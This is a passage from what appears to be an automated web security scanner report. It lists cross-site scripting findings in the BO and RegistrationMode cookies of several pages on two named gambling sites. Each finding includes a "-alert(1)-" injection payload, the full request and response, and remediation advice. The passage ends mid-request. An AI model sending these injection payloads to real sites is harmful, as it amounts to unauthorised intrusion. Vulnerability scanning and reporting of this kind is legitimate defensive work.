<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM7ee3a"-alert(1)-"140d6128279";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.259. http://www.info.crazyscratch.com/UnderAge.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80420"-alert(1)-"559429cbbbf was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM80420"-alert(1)-"559429cbbbf; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:52:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:16 GMT; path=/
Set-Cookie: BO=FM80420"-alert(1)-"559429cbbbf; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:16 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:16 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:16 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54287


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM80420"-alert(1)-"559429cbbbf";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.260. http://www.info.crazyscratch.com/UnderAge.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75d3c"-alert(1)-"b6694994ca2 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM75d3c"-alert(1)-"b6694994ca2; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM75d3c"-alert(1)-"b6694994ca2; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:40 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:40 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:40 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:40 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54287


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM75d3c"-alert(1)-"b6694994ca2";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.261. http://www.karamba.com/ [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a65"-alert(1)-"60ba66ac5be was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM35a65"-alert(1)-"60ba66ac5be; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/
Set-Cookie: BO=FM35a65"-alert(1)-"60ba66ac5be; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:47 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM35a65"-alert(1)-"60ba66ac5be";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.262. http://www.karamba.com/ [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2d46"-alert(1)-"1e89358a960 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMa2d46"-alert(1)-"1e89358a960; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMa2d46"-alert(1)-"1e89358a960; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:36 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMa2d46"-alert(1)-"1e89358a960";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.263. http://www.karamba.com/AboutUs.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dfb5"-alert(1)-"ba293f13ed2 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM5dfb5"-alert(1)-"ba293f13ed2; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/
Set-Cookie: BO=FM5dfb5"-alert(1)-"ba293f13ed2; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:54 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47573


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM5dfb5"-alert(1)-"ba293f13ed2";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.264. http://www.karamba.com/AboutUs.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eefdb"-alert(1)-"f5f9d8a99ed was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMeefdb"-alert(1)-"f5f9d8a99ed; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMeefdb"-alert(1)-"f5f9d8a99ed; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:41 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47573


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMeefdb"-alert(1)-"f5f9d8a99ed";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.265. http://www.karamba.com/FairPlay.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95c72"-alert(1)-"49ec3582046 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM95c72"-alert(1)-"49ec3582046; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/
Set-Cookie: BO=FM95c72"-alert(1)-"49ec3582046; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:27 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46999


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM95c72"-alert(1)-"49ec3582046";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.266. http://www.karamba.com/FairPlay.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39bc5"-alert(1)-"237d966b40f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM39bc5"-alert(1)-"237d966b40f; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM39bc5"-alert(1)-"237d966b40f; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:16 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46999


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM39bc5"-alert(1)-"237d966b40f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.267. http://www.karamba.com/Help.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f0ee"-alert(1)-"7c2a7c12ad4 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM1f0ee"-alert(1)-"7c2a7c12ad4; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: BO=FM1f0ee"-alert(1)-"7c2a7c12ad4; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM1f0ee"-alert(1)-"7c2a7c12ad4";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.268. http://www.karamba.com/Help.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.karamba.com
Path:   /Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8630"-alert(1)-"42d13196f0f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
